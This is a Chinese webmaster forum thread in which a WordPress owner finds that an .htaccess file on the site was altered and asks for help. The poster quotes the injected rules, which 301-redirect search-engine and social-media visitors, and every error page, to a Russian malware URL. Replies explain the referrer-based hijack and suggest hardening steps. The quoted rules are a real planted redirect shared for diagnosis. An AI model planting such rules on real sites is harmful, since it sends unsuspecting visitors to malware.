看我某站点上的.haccess文件，这是被别人黑了吧？谢谢

roror999

一个wordpress站点，

今天偶尔将二级目录打错，发现跳转到

1. http://pyatnickiy.ru/track.php

复制代码

纳闷，一顿搜索，发现站点根目录下的.haccess文件达27KB

打开一看，部分代码如下

1. <IfModule mod_rewrite.c>                                
   
2. RewriteEngine On                                       
   + D4 b; |6 f0 ?2 u
3. RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)         
   
4. RewriteRule ^(.*)$ http://pyatnickiy.ru/track.php [R=301,L]   
   : w% p7 n. |/ ~6 T& ~
5. RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)                                                                                
   & N# y2 D' X9 }
6. RewriteRule ^(.*)$ http://pyatnickiy.ru/track.php [R=301,L]                                                
   
7. </IfModule>                                                                                                                                                                     
   ) P6 R* `3 Z' j, K
8. ErrorDocument 400 http://pyatnickiy.ru/track.php                                                
   
9. ErrorDocument 401 http://pyatnickiy.ru/track.php        
   
10. ErrorDocument 403 http://pyatnickiy.ru/track.php        
    
11. ErrorDocument 404 http://pyatnickiy.ru/track.php        
    
12. ErrorDocument 500 http://pyatnickiy.ru/track.php

复制代码

这是曾经被别人黑过了吧？

黑客到我站点里做了什么，对他有什么好处呢？  
求助，谢了先

% m1 }# S( N# I& \# C/ }9 E2 u0 P# b
0 w% }  ?9 ^. D5 a

roror999

补充，这个站点安装在hawkhost老鹰主机的空间里

满意沟通

来源那些搜索引擎的流量 301到那个网站

400等那些错误 也到那个网站
1 C% s5 u1 M3 q' L1 H

生鱼片

网站被劫持了 自己打开看不到
从GOOGLE点进来301到http://pyatnickiy.ru/track.php

roror999

生鱼片 发表于 2013-4-9 16:52
网站被劫持了 自己打开看不到
/ d2 I* d6 k' \$ @从GOOGLE点进来301到http://pyatnickiy.ru/track.php

, ?9 f* J" q$ X. K+ @; j谢谢，果然如此，
! o, B* a2 v) ~, K
. N; v3 b7 O& p( m6 r我在google.com里site：domain.com ，点链接过去，google提示
6 }. D1 X: |5 g3 p
要前往的网站包含恶意软件！
5 N: O$ v! R: lGoogle Chrome现已阻止访问 mampoks.ru。

dfy

俄罗斯的黑客。。。

浅醉

最近发觉黑客活动特别频繁,让我等小白情何以堪

gger

一直不知道这个文件的作用

number007

网站被劫持了 自己打开看不到

好人

number007 发表于 2013-4-9 20:31
- ~/ a$ Y9 F  k- U- ~7 [, h网站被劫持了 自己打开看不到

301跳转。
' P2 }+ r* O( o; h0 K从上面来路的，自动跳转到他的网站。

好人

roror999 发表于 2013-4-9 16:23
7 v5 C+ F/ K8 x$ P' ~补充，这个站点安装在hawkhost老鹰主机的空间里

我也是老鹰主机的。也出现过这种情况。301跳转。老鹰主机一个IP 几十个站，对方是旁注写入的。你根本就没有办法。
给ADMIN文件夹加个密吧。否则有你受的。
不知道你是不是WP程序，如果是，加个安全插件。通过这两个方法，应该可以解决这个问题。

米客小D

好人 发表于 2013-4-9 21:56
4 g  L" h9 G( t1 W我也是老鹰主机的。也出现过这种情况。301跳转。老鹰主机一个IP 几十个站，对方是旁注写入的。你根本就没 ...

" U7 t5 Q, n7 g* k& u$ S7 k文件夹加密怎么设置啊 在哪里设置？

goyh

看来要注意下了，，，

roror999

好人 发表于 2013-4-9 21:56
我也是老鹰主机的。也出现过这种情况。301跳转。老鹰主机一个IP 几十个站，对方是旁注写入的。你根本就没 ...

兄弟您好，用的wordpress
+ [0 p" @( I: H' \, j' O9 }" w) o- Y请问，给admin文件夹加密，怎么做呀？
0 A" Y/ o: n, p
谢了先
2 T+ D! M  b% W2 e% h/ s# {

mediabuy

被劫持了。这些关键词从这些搜索引擎进来则跳转。